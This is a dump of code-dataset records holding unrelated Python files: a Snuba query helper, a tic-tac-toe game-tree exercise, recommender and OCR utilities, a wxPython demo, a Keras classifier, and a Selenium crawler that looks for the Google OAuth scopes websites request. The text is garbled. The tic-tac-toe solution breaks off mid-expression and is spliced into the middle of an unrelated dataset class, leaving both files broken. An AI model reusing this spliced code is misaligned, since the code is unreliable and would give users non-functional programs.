}) if (v is not None)}\n    try:\n        response = requests.post(url, data=json.dumps(request))\n        response.raise_for_status()\n    except requests.RequestException as re:\n        raise SnubaError(re)\n    try:\n        response = json.loads(response.text)\n    except ValueError:\n        raise SnubaError('Could not decode JSON response: {}'.format(response.text))\n    aggregate_cols = [a[2] for a in aggregations]\n    expected_cols = set((groupby + aggregate_cols))\n    got_cols = set((c['name'] for c in response['meta']))\n    assert (expected_cols == got_cols)\n    for d in response['data']:\n        if ('time' in d):\n            d['time'] = int(to_timestamp(parse_datetime(d['time'])))\n        for col in rev_snuba_map:\n            if (col in d):\n                d[col] = rev_snuba_map[col][d[col]]\n    return nest_groups(response['data'], groupby, aggregate_cols)","sub_path":"Data Set/bug-fixing-5/65a51c4c5777ee4f06c25775bea4bd66bc8a461b--fix.py","file_name":"65a51c4c5777ee4f06c25775bea4bd66bc8a461b--fix.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"}
{"seq_id":"250116438","text":"'''\nTris (tic-tac-toe) is a very popular game. It is played on a square 3x3 grid.\nThe two players take turns picking an empty cell and drawing their own symbol\nin it (one player's symbol is an \"o\" and the opponent's is an 'x').\nThe winner is the player who manages to place three of their symbols in a straight\nhorizontal, vertical or diagonal line. If the grid fills up without either player\nhaving completed a straight line of three symbols, the game ends in a tie.\nWhen the game ends that way, the match is called a \"draw\" (\"patta\").\nBy convention, on an empty grid the first move always belongs to player 'o'.\n\nA game configuration is therefore uniquely determined by the content of the grid.\n\nIn what follows we assume the content of the grid is represented as a list of lists.\nThe list of lists M has size 3x3 and M[i][j] contains '', 'x' or 'o' depending on\nwhether the grid cell in the i-th row and j-th column is still free, contains the\nsymbol 'x' or contains the symbol 'o'.\n\nGiven a game configuration C, the game tree for C is the tree obtained recursively\nby starting from configuration C and assigning as children the configurations that\ncan be reached from C with one further move of the game. The leaves of the tree are\nthe possible outcomes of the match, that is, the different configurations reachable\nfrom C that represent draws, wins for 'o' or wins for 'x'.\nSee for example the image albero_di_gioco.png, which shows the game tree obtained\nstarting from the configuration represented by [['x', 'o', 'o'], ['x', 'x', 'o'], ['', '', '']]\n\n\nConsider the following class of objects:\n\n\nclass NodoTris:\n    def __init__(self, griglia):\n        self.nome = griglia\n        self.lista_figli = []\n\n\nYou must design the following function\n\ngen_tree(griglia)\nwhich, given the game configuration griglia, builds the game tree obtained starting\nfrom the configuration griglia and returns its root. The tree nodes must be\nobjects of the NodoTris class.\n\nTo test the correctness of your implementation of gen_tree() the grader will use four\nmethods of the NodoTris class that you must implement in any case:\n\n1)\ntipo(self)\nwhich, given a NodoTris node, returns:\n    'o' if the configuration represented by the node is a winning configuration for player 'o'\n    'x' if the configuration represented by the node is a winning configuration for player 'x'\n    '-' if the configuration represented by the node is a draw configuration\n    '?' if the configuration represented by the node is a configuration of a game not yet over\n\n2)\nesiti(self)\nwhich, given a node that is the root of a game tree, returns a triple with the possible\noutcomes of the match whose initial configuration is the one represented by the node.\nMore precisely: the first element of the triple is the number of possible draws,\nthe second is the number of possible wins for player 'o', while the third element\nis the number of possible wins for player 'x'.\n\n3)\nvittorie_livello(self, giocatore, h)\nwhich, given a node that is the root of a game tree, one of the two players and an\ninteger h, returns the number of nodes that represent a win for that player and sit\nat height h in the tree. In other words, it returns the number of possible wins for\nthe player in exactly h moves, in the match whose initial configuration is the one\nrepresented by the root of the tree.\n\n4)\nstrategia_vincente(self,giocatore)\nwhich, given a node that is the root of a game tree and one of the two players, returns True or False.\nIt returns True if the player has a winning strategy in the match whose initial\nconfiguration is the one represented by the root node, False otherwise.\n\nNote that a player has a winning strategy with respect to a given configuration if,\nwhatever the opponent's moves, they always have a way to reply so that the match\nends with their victory.\n\nYou may of course define further functions and other methods for the NodoTris class\nif you find them useful for solving the assignment.\n\nYou may assume that the game configurations represented by griglia are always legal\nconfigurations (i.e. obtained after some number of moves starting from the empty grid).\n\n\nWARNING: do not use non-ASCII characters, such as accented letters; do not\nimport modules that are not in the standard library.\n\nNOTE: the tests are run with a global timeout of 2*N seconds (if the grader runs N tests).\n'''\nfrom copy import deepcopy\n\n\ndef trova_esiti(radice,lista):\n    if radice.situazione=='-':lista[0]+=1\n    elif radice.situazione=='o':lista[1]+=1\n    elif radice.situazione=='x':lista[2]+=1\n    else:\n        for r in radice.lista_figli:\n            trova_esiti(r,lista)\n\n\ndef trova_vittorie_livello(radice,g,h,lista):\n    if radice.livello0:\r\n        #self.AVAILABLE_ICM = ICM_dictionary\r\n        # self.AVAILABLE_ICM_feature_mapper = ICM_feature_mapper_dictionary\r\n        # self._HAS_ICM = True\r\n\r\n    \r\n    def get_dataset_name(self):\r\n        return self.DATASET_NAME\r\n\r\n    def get_urm_train(self) :\r\n        return self.URM_train_av.copy()\r\n    \r\n    def get_urm_validation(self) :\r\n        return self.URM_validation_av.copy()\r\n    \r\n    def get_urm_test(self) :\r\n        return self.URM_test_av.copy()\r\n\r\n    #def get_icm(self) :\r\n    #    return self.AVAILABLE_ICM.copy()\r\n\r\n\r\n\r\n    #########################################################################################################\r\n    ##########                                                                                     ##########\r\n    ##########                                LOAD AND SAVE                                        ##########\r\n    ##########                                                                                     ##########\r\n    #########################################################################################################\r\n\r\n    def save_data(self, save_folder_path):\r\n\r\n        dataIO = DataIO(folder_path = save_folder_path)\r\n        \r\n        global_attributes_dict = {\r\n            \"DATASET_NAME\": self.DATASET_NAME\r\n        }\r\n\r\n        dataIO.save_data(file_name = \"dataset_global_attributes\", data_dict_to_save = global_attributes_dict)\r\n\r\n        dataIO.save_data(data_dict_to_save = self.URM_train_av, file_name = \"dataset_URM_train\")\r\n\r\n        dataIO.save_data(data_dict_to_save = self.URM_validation_av, file_name = \"dataset_URM_validation\")\r\n\r\n        dataIO.save_data(data_dict_to_save = self.URM_test_av,\r\n                         file_name = \"dataset_URM_test\")\r\n\r\n        # dataIO.save_data(data_dict_to_save = self.AVAILABLE_ICM,\r\n        #                  file_name = \"dataset_ICM\")\r\n\r\n        \r\n\r\n    def load_data(self, save_folder_path):\r\n\r\n        dataIO = DataIO(folder_path = save_folder_path)\r\n\r\n        global_attributes_dict = dataIO.load_data(file_name = \"dataset_global_attributes\")\r\n\r\n        for attrib_name, attrib_object in global_attributes_dict.items():\r\n            self.__setattr__(attrib_name, attrib_object)\r\n\r\n        self.URM_train_av = dataIO.load_data(file_name = \"dataset_URM_train\")\r\n        \r\n        self.URM_validation_av = dataIO.load_data(file_name = \"dataset_URM_validation\")\r\n\r\n        self.URM_test_av = dataIO.load_data(file_name = \"dataset_URM_test\")\r\n        \r\n        # self.AVAILABLE_ICM = dataIO.load_data(file_name = \"dataset_ICM\")
\r\n","sub_path":"Data_manager/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"186479827","text":"class Node(object):\n def __init__(self, val, neighbors):\n self.val = val\n self.neighbors = neighbors\n\nclass Solutions(object):\n def cloneGraph(self, node):\n d = dict()\n q = [node]\n d[node] = Node(node.val, [])\n while q:\n n = q.pop(0)\n newnode = d[n]\n for x in n.neighbors:\n if d.get(x):\n newnode.neighbors.append(d.get(x))\n else:\n d[x] = Node(x.val, [])\n newnode.neighbors.append(d[x])\n q.append(x)\n return d[node]\n # DFS\n def cloneGraph2(self, node):\n d = dict()\n stack = [node]\n d[node] = Node(node.val, [])\n while stack:\n curr = stack.pop()\n n = d[curr]\n for x in curr.neighbors:\n if d.get(x):\n n.neighbors.append(d[x])\n else:\n d[x] = Node(x.val, [])\n stack.append(x)\n n.neighbors.append(d[x])\n return d[node]\n\n # 记忆化递归\n def cloneGraph3(self, node):\n if node is None:\n return None\n \n # 题目中说val在1到100之间\n memo = [None] * 101\n\n # 返回值为当前节点的复制\n def draw(node):\n if memo[node.val]:\n return memo[node.val]\n \n res = Node(node.val, [])\n memo[node.val] = res\n for nei in node.neighbors:\n res.neighbors.append(draw(nei))\n return res\n \n return draw(node)\n\n","sub_path":"133_CloneGraph.py","file_name":"133_CloneGraph.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"189945499","text":"import string\r\nimport editdistance\r\nimport numpy as np\r\nfrom data_provider.data_utils import get_vocabulary\r\nimport editdistance\r\n\r\ndef _normalize_text(text):\r\n text = ''.join(filter(lambda x: x in (string.digits + string.ascii_letters), text))\r\n return text.lower()\r\n\r\ndef idx2label(inputs, id2char=None, char2id=None):\r\n\r\n if id2char is None:\r\n voc, char2id, id2char = get_vocabulary(voc_type=\"ALLCASES_SYMBOLS\")\r\n\r\n def end_cut(ins):\r\n cut_ins = []\r\n for id in ins:\r\n if id != char2id['EOS']:\r\n if id != char2id['UNK']:\r\n cut_ins.append(id2char[id])\r\n else:\r\n break\r\n return cut_ins\r\n\r\n if isinstance(inputs, np.ndarray):\r\n assert len(inputs.shape) == 2, \"input's rank should be 2\"\r\n results = [''.join([ch for ch in end_cut(ins)]) for ins in inputs]\r\n return results\r\n else:\r\n print(\"input to idx2label should be numpy array\")\r\n return inputs\r\n\r\ndef calc_metrics(predicts, labels, metrics_type='accuracy'):\r\n assert metrics_type in ['accuracy', 'editdistance'], \"Unsupported metrics type {}\".format(metrics_type)\r\n predicts = [_normalize_text(pred) for pred in predicts]\r\n labels = [_normalize_text(targ) for targ in labels]\r\n if metrics_type == 'accuracy':\r\n acc_list = [(pred == tar) for pred, tar in zip(predicts, labels)]\r\n accuracy = 1.0 * sum(acc_list) / len(acc_list)\r\n return accuracy\r\n elif metrics_type == 'editdistance':\r\n ed_list = [editdistance.eval(pred, targ) for pred, targ in zip(predicts, labels)]\r\n eds = sum(ed_list)\r\n return eds\r\n\r\n return -1\r\n\r\ndef calc_metrics_length(predicts, labels, metrics_type='accuracy'):\r\n assert metrics_type in ['accuracy', 'editdistance'], \"Unsupported metrics type {}\".format(metrics_type)\r\n predicts = [_normalize_text(pred) for pred in predicts]\r\n labels = [_normalize_text(targ) for targ in labels]\r\n lenghts = [len(la) for la in labels]\r\n\r\n predicts_ = np.array(predicts)\r\n labels_ = np.array(labels)\r\n 
\r\n    lenghts_ = np.array(lenghts)\r\n\r\n    len_acc = {}\r\n    for l in range(lenghts_.min(), lenghts_.max() + 1):  # include the longest length bucket\r\n        group_predicts = predicts_[lenghts_==l].tolist()\r\n        group_labels = labels_[lenghts_==l].tolist()\r\n        assert len(group_predicts) == len(group_labels)\r\n        if len(group_predicts) == 0:\r\n            continue\r\n        acc_list = [(pred == tar) for pred, tar in zip(group_predicts, group_labels)]\r\n        # accuracy = 1.0 * sum(acc_list) / len(acc_list)\r\n        len_acc[l] = (sum(acc_list), len(acc_list))\r\n\r\n    return len_acc\r\n\r\ndef _lexicon_search(lexicon, word):\r\n    edit_distances = []\r\n    lexicon = [_normalize_text(lex) for lex in lexicon]\r\n    for lex_word in lexicon:\r\n        edit_distances.append(editdistance.eval(_normalize_text(lex_word), _normalize_text(word)))\r\n    edit_distances = np.asarray(edit_distances, dtype=int)\r\n    argmin = np.argmin(edit_distances)\r\n    return lexicon[argmin]\r\n\r\ndef calc_metrics_lexicon(predicts, labels, lexicons, metrics_type='accuracy'):\r\n    assert metrics_type in ['accuracy', 'editdistance'], \"Unsupported metrics type {}\".format(metrics_type)\r\n    predicts = [_normalize_text(pred) for pred in predicts]\r\n    labels = [_normalize_text(targ) for targ in labels]\r\n    refine_predicts = [_lexicon_search(l, p) for l, p in zip(lexicons, predicts)]\r\n\r\n    if metrics_type == 'accuracy':\r\n        acc_list = [(pred == tar) for pred, tar in zip(refine_predicts, labels)]\r\n        accuracy = 1.0 * sum(acc_list) / len(acc_list)\r\n        return accuracy\r\n    elif metrics_type == 'editdistance':\r\n        ed_list = [editdistance.eval(pred, targ) for pred, targ in zip(refine_predicts, labels)]\r\n        eds = sum(ed_list)\r\n        return eds","sub_path":"utils/transcription_utils.py","file_name":"transcription_utils.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"495846093","text":"import numpy as np\nfrom scipy import signal\nfrom argparse import ArgumentParser\np = ArgumentParser()\np.add_argument('dt',type=float)\na = p.parse_args()\n\nprint('switch(Hz)\\n{')\n\nfrequencies = 50.
* np.array(2**np.arange(9))\nfor freq in frequencies:\n\tsos = signal.butter(2,freq,btype='high',output='sos',fs=1./a.dt)\n\tprint('\\tcase %d:' % freq)\n\tfor c,v in zip(['b0','b1','b2','a0','a1','a2'],sos[0]):\n\t\tif c == 'a0':\n\t\t\tcontinue\n\t\tprint('\\t\\t%s = %.15f;' % (c,v))\n\tprint('\\t\\tbreak;')\nprint('}')\n\n\n\n","sub_path":"tools/hpf2polecoeffs.py","file_name":"hpf2polecoeffs.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"262143820","text":"# Name : TEST language compiler\r\n# Time : 2018.11.20 ~ 2018.\r\n# Developer : wngg\r\n# Coding : utf-8\r\n\r\n\r\n# --------------------CLASS-------------------- #\r\n\r\n# Grammatical analyzer\r\n# Purpose: performs the grammatical analysis\r\n# Input: file path\r\nclass GrammaticalAnalysis :\r\n\r\n\tdef __init__(self,inPath) :\r\n\r\n\t\tself.outPath = inPath[:inPath.rfind(\"\\\\\") + 1] + \"Grammatical_out.txt\"\t\t# path of the output file\r\n\t\tself.inFile = open(inPath,\"r\")\t\t\t\t\t\t\t\t\t\t\t\t# open the input file\r\n\t\tself.outFile = open(self.outPath,\"w\")\t\t\t\t\t\t\t\t\t\t# open the output file","sub_path":"grammaticalAnalysis.py","file_name":"grammaticalAnalysis.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"370268889","text":"#!/usr/bin/env python\n\n\"\"\"\nExample of the very basic, minimal framework for a wxPython application\n\nThis one adds another sizer to fix the layout -- and the WIT!\n\"\"\"\n\n\nimport os  # needed by the file dialog's os.getcwd() below\nimport wx\n\n#---------------------------------------------------------------------------\n\n# This is how you pre-establish a file filter so that file dialogs\n# only show the extension(s) you want it to.\nwildcard = \"Python source (*.py)|*.py|\" \\\n           \"Compiled Python (*.pyc)|*.pyc|\" \\\n           \"SPAM files (*.spam)|*.spam|\" \\\n           \"Egg file (*.egg)|*.egg|\" \\\n           \"All files (*.*)|*.*\"\n\n#---------------------------------------------------------------------------\n\nclass AppLogic(object):\n    \"\"\"\n    A class to hold the Application Logic.\n\n    You generally don't want the real logic of the app mixed\n    in with the GUI\n\n    In a real app, this would be a substantial collection of\n    modules, classes, etc...\n    \"\"\"\n    def file_open(self, filename=\"default_name\"):\n        \"\"\"This method opens a file\"\"\"\n        print(\"Open a file: \")\n        print(\"I'd be opening file: %s now\"%filename)\n\n    def file_close(self):\n        \"\"\"This method closes a file\"\"\"\n        print(\"Close a file: \")\n        print(\"I'd be closing a file now\")\n\n\nclass ButtonPanel(wx.Panel):\n    def __init__(self, *args, **kwargs):\n        wx.Panel.__init__(self, *args, **kwargs)\n\n        ## add a button:\n        theButton1 = wx.Button(self, label=\"Push Me\")\n        theButton1.Bind(wx.EVT_BUTTON, self.onButton)\n\n        ## add another button:\n        theButton2 = wx.Button(self, label=\"Push Me Also\")\n        theButton2.Bind(wx.EVT_BUTTON, self.onButton)\n\n        ## do the layout\n        buttonSizer = wx.BoxSizer(wx.VERTICAL)\n\n        buttonSizer.Add((1,1), 1) # stretchable space\n        buttonSizer.Add(theButton1, 0, wx.GROW | wx.ALL, 4)\n        buttonSizer.Add(theButton2, 0, wx.GROW | wx.ALL, 4)\n        buttonSizer.Add((1,1), 3) # stretchable space\n\n        ## need another sizer to get the horizontal placement right:\n        mainSizer = wx.BoxSizer(wx.HORIZONTAL)\n        mainSizer.Add((1,1), 1) # stretchable space\n        mainSizer.Add(buttonSizer, 0, wx.GROW) # the sizer with the buttons in it\n        mainSizer.Add((1,1), 1) # stretchable space\n\n        self.SetSizer(mainSizer)\n\n    def onButton(self, evt=None):\n        print(\"You pushed one of the buttons!\")\n\n\nclass
TestFrame(wx.Frame):\n def __init__(self, app_logic, *args, **kwargs):\n kwargs.setdefault('title', \"Simple test App\")\n wx.Frame.__init__(self, *args, **kwargs)\n\n self.app_logic = app_logic\n\n # put the Panel on the frame\n self.buttonPanel = ButtonPanel(self)\n\n # Build up the menu bar:\n menuBar = wx.MenuBar()\n \n fileMenu = wx.Menu()\n openMenuItem = fileMenu.Append(wx.ID_ANY, \"&Open\", \"Open a file\" )\n self.Bind(wx.EVT_MENU, self.onOpen, openMenuItem)\n\n closeMenuItem = fileMenu.Append(wx.ID_ANY, \"&Close\", \"Close a file\" )\n self.Bind(wx.EVT_MENU, self.onClose, closeMenuItem)\n\n exitMenuItem = fileMenu.Append(wx.ID_EXIT, \"Exit\", \"Exit the application\")\n self.Bind(wx.EVT_MENU, self.onExit, exitMenuItem)\n menuBar.Append(fileMenu, \"&File\")\n \n helpMenu = wx.Menu()\n helpMenuItem = helpMenu.Append(wx.ID_HELP, \"Help\", \"Get help\")\n menuBar.Append(helpMenu, \"&Help\")\n\n self.SetMenuBar(menuBar)\n \n def onOpen(self, evt=None):\n \"\"\"This method opens an existing file\"\"\"\n print(\"Open a file: \")\n # Create the dialog. In this case the current directory is forced as the starting\n # directory for the dialog, and no default file name is forced. This can easily\n # be changed in your program. This is an 'open' dialog, and allows multiple\n # file selections as well.\n #\n # Finally, if the directory is changed in the process of getting files, this\n # dialog is set up to change the current working directory to the path chosen.\n dlg = wx.FileDialog(\n self, message=\"Choose a file\",\n defaultDir=os.getcwd(), \n defaultFile=\"\",\n wildcard=wildcard,\n style=wx.OPEN | wx.CHANGE_DIR\n )\n\n # Show the dialog and retrieve the user response. If it is the OK response, \n # process the data.\n if dlg.ShowModal() == wx.ID_OK:\n # This returns a Python list of files that were selected.\n path = dlg.GetPath()\n print(\"I'd be opening file in onOpen \", path)\n self.app_logic.file_open( path )\n else :\n print(\"The file dialog was canceled before anything was selected\")\n\n # Destroy the dialog. 
Don't do this until you are done with it!\n # BAD things can happen otherwise!\n dlg.Destroy()\n\n def onClose(self, evt=None):\n print(\"close menu selected\")\n self.app_logic.file_close()\n\n def onExit(self, evt=None):\n print(\"Exit the program here\")\n print(\"The event passed to onExit is type \", type(evt), end=' ')\n self.Close()\n\n\nclass TestApp(wx.App):\n def OnInit(self):\n \"\"\"\n App initilization goes here -- not much to do, in this case\n \"\"\"\n app_logic = AppLogic()\n f = TestFrame(app_logic, parent=None)\n f.Show()\n\n return True\n\nif __name__ == \"__main__\":\n\n app = TestApp(False)\n ## set up the WIT -- to help debug sizers\n import wx.lib.inspection\n wx.lib.inspection.InspectionTool().Show()\n app.MainLoop()\n\n","sub_path":"Examples/wxpython/basic_app_7.py","file_name":"basic_app_7.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103788606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 22 10:10:03 2020\n\n@author: Saad\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nbankdata2 = pd.read_csv(\"trainingCommonVoicePreProcessedWithAgeGroupsRemovingOther.csv\")\n\nX = bankdata2.iloc[:, :-4].values\ny = bankdata2.iloc[:, [34,36,37]].values\n\n\n# # Encoding the Dependent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_y0 = LabelEncoder()\nlabelencoder_y1 = LabelEncoder()\nlabelencoder_y2 = LabelEncoder()\ny[:,0] = labelencoder_y0.fit_transform(y[:,0])\ny[:,1] = labelencoder_y1.fit_transform(y[:,1])\ny[:,2] = labelencoder_y2.fit_transform(y[:,2])\ny = y.astype(float)\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# Importing the Keras libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\n\n# Initialising the ANN\nclassifier = Sequential()\n\n# Adding the input layer and the first hidden layer\nclassifier.add(Dense(units = 18, kernel_initializer = 'uniform', activation = 'relu', input_dim = 34))\n# classifier.add(Dropout(p = 0.1))\n\n# Adding the second hidden layer\nclassifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))\n# classifier.add(Dropout(p = 0.1))\n\n# Adding the output layer\nclassifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))\n\n# Compiling the ANN\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\n# Fitting the ANN to the Training set\nclassifier.fit(X_train, y_train[:,0], batch_size = 10, epochs = 50)\n\n\n\nimport numpy \n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\ny_pred =numpy.multiply(y_pred>0.5, 1) \n\n\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test[:,0], y_pred)\n\nfrom sklearn.metrics import accuracy_score, classification_report\nprint(cm)\nprint(classification_report(y_test[:,0],y_pred))\nprint(\"accuracy:\",accuracy_score(y_test[:,0],y_pred,normalize=True))\n\n\n# Tuning the ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom 
sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\ndef build_classifier(optimizer):\n classifier = Sequential()\n classifier.add(Dense(units = 18, kernel_initializer = 'uniform', activation = 'relu', input_dim = 34))\n classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))\n classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))\n classifier.compile(optimizer = optimizer, loss = 'binary_crossentropy', metrics = ['accuracy'])\n return classifier\nclassifier = KerasClassifier(build_fn = build_classifier)\nparameters = {'batch_size': [25, 32],\n 'epochs': [50, 60],\n 'optimizer': ['adam', 'rmsprop']}\ngrid_search = GridSearchCV(estimator = classifier,\n param_grid = parameters,\n scoring = 'accuracy',\n cv = 10)\ngrid_search = grid_search.fit(X_train, y_train[:,0])\nbest_parameters = grid_search.best_params_\nbest_accuracy = grid_search.best_score_","sub_path":"Ann.py","file_name":"Ann.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"287661735","text":"'''\nCreated by gluthier on 29/12/2015\n'''\n\nimport json\nimport re\nimport time\nimport sys\nimport advanced_crawler as ac\nimport selenium.webdriver as webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nscopes = {\n\t'drive[^.]': 'https://www.googleapis.com/auth/drive',\n\t'drive.readonly': 'https://www.googleapis.com/auth/drive.readonly',\n\t'drive.appfolder': 'https://www.googleapis.com/auth/drive.appfolder',\n\t'drive.apps.readonly': 'https://www.googleapis.com/auth/drive.apps.readonly',\n\t'drive.file': 'https://www.googleapis.com/auth/drive.file',\n\t'drive.install': 'https://www.googleapis.com/auth/drive.install',\n\t'drive.metadata[^.]': 'https://www.googleapis.com/auth/drive.metadata',\n\t'drive.metadata.readonly': 'https://www.googleapis.com/auth/drive.metadata.readonly',\n\t'drive.photos.readonly': 'https://www.googleapis.com/auth/drive.photos.readonly',\n\t'drive.scripts': 'https://www.googleapis.com/auth/drive.scripts',\n\t'drive.appdata': 'https://www.googleapis.com/auth/drive.appdata',\n\t'userinfo.email': 'https://www.googleapis.com/auth/userinfo.email',\n\t'userinfo.profile': 'https://www.googleapis.com/auth/userinfo.profile',\n\t'plus.login': 'https://www.googleapis.com/auth/plus.login',\n\t'plus.me': 'https://www.googleapis.com/auth/plus.me',\n\t'plus.profiles.read': 'https://www.googleapis.com/auth/plus.profiles.read',\n\t'calendar[^.]': 'https://www.googleapis.com/auth/calendar',\n\t'calendar.readonly': 'https://www.googleapis.com/auth/calendar.readonly'\n}\n\ncandidates = ['drive', 'google', 'oauth', 'authorize', 'sign', 'login', 'load', 'open', 'account', 'select', 'start', 'log']\n\ndef retrievePermissions(url):\n\tfound = False\n\ttry:\n\t\tfor s in scopes:\n\t\t\t# for each scope, we build a regex to find it in a URL\n\t\t\tp = re.compile('https(?:%3A|:)(?:%2F|/){2}www.googleapis.com(?:%2F|/)auth(?:%2F|/)('+s+')')\n\t\t\tif p.search(url):\n\t\t\t\tfound = True\n\t\t\t\tprint(\" \" + scopes[s])\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef closeEventualAlert():\n\ttry:\n\t\t# wait for an eventual alert to close it\n\t\tWebDriverWait(driver, 1).until(EC.alert_is_present())\n\t\talert = driver.switch_to_alert()\n\t\talert.accept()\n\texcept Exception as 
e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef clickElement(elem):\n\tfound = False\n\t# remember where we are in case the click opens a new page\n\tmain_window = driver.current_window_handle\n\tmain_window_url = driver.current_url\n\ttry:\n\t\tif elem.is_displayed():\n\t\t\telem.click()\n\t\t\tcloseEventualAlert()\n\t\t\t# each window opened has an handle to acces it\n\t\t\tfor handle in driver.window_handles:\n\t\t\t\t# to retrieve an URL, we have to go to the page to get it\n\t\t\t\tdriver.switch_to.window(handle)\n\t\t\t\tcurrent_url = driver.current_url\n\t\t\t\tfound = retrievePermissions(current_url)\n\t\t\t\tif current_url != main_window_url:\n\t\t\t\t\t# if it went to another page, we go back\n\t\t\t\t\turl = driver.current_url\n\t\t\t\t\tdriver.back()\n\t\t\t\t\tcloseEventualAlert()\n\t\t\t\tif handle != main_window:\n\t\t\t\t\t# if it opened another window, we close it\n\t\t\t\t\tdriver.close()\n\t\t\t\t\tcloseEventualAlert()\n\t\t\t\tdriver.switch_to_window(main_window)\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef searchPermissions(elems):\n\ttry:\n\t\tfor e in elems:\n\t\t\t# candidates contain keywords that might lead to google drive\n\t\t\tfor c in candidates:\n\t\t\t\t# test on the id, title, class or text content of the element\n\t\t\t\tif e and (str(e.get_attribute('id')).lower().find(c) >= 0 or str(e.get_attribute('title')).lower().find(c) >= 0 or str(e.get_attribute('class')).lower().find(c) >= 0 or str(e.text).lower().find(c) >= 0):\n\t\t\t\t\tif clickElement(e):\n\t\t\t\t\t\treturn True\n\t\treturn False\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef findElementsInPage():\n\tfound = False\n\ttry:\n\t\t# start with the buttons on the page\n\t\tbuttons = driver.find_elements_by_xpath('//button')\n\t\tfound = searchPermissions(buttons)\n\t\tif not found:\n\t\t\t# continue with all elements on the page\n\t\t\telems = driver.find_elements_by_xpath('//body//*')\n\t\t\tfound = searchPermissions(elems)\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef crawlPage(url):\n\tfound = False\n\ttry:\n\t\tdriver.get(url) # get the page\n\t\tcloseEventualAlert()\n\t\tfound = retrievePermissions(url) # check if URL is already the one needed\n\t\tif not found:\n\t\t\tfound = findElementsInPage()\n\t\treturn found\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\ndef runScript():\n\ttry:\n\t\tcounter_found = 0\n\t\tcounter_total = 0\n\t\ttime_start = int(time.time())\n\t\twith open('websites.txt', 'r') as json_data:\n\t\t\twebsites = json.load(json_data)\n\t\t\tjson_data.close()\n\t\t\tfor url in websites:\n\t\t\t\tif url:\n\t\t\t\t\tcounter_total = counter_total + 1\n\t\t\t\t\tprint('Crawling: ' + url)\n\t\t\t\t\t# launch the script\n\t\t\t\t\tif crawlPage(url):\n\t\t\t\t\t\tcounter_found = counter_found + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\t# if not found, run the advanced script\n\t\t\t\t\t\tif ac.runAdvancedCrawler(url, driver):\n\t\t\t\t\t\t\tcounter_found = counter_found + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint('...permissions not found')\n\texcept Exception as e:\n\t\tprint(e, file=sys.stderr)\n\t\tpass\n\tfinally:\n\t\ttime_end = int(time.time())\n\t\tdiff_sec = time_end - time_start\n\t\tdiff_min = int(diff_sec / 60)\n\t\tprint('Time to run the script: ' + str(diff_sec) + ' sec (~' + str(diff_min) + ' min)')\n\t\tprint('Found: ' + str(counter_found) + ' (over ' + str(counter_total) + ' tested)')\n\t\tdriver.quit()\n\n# Configure the outputs 
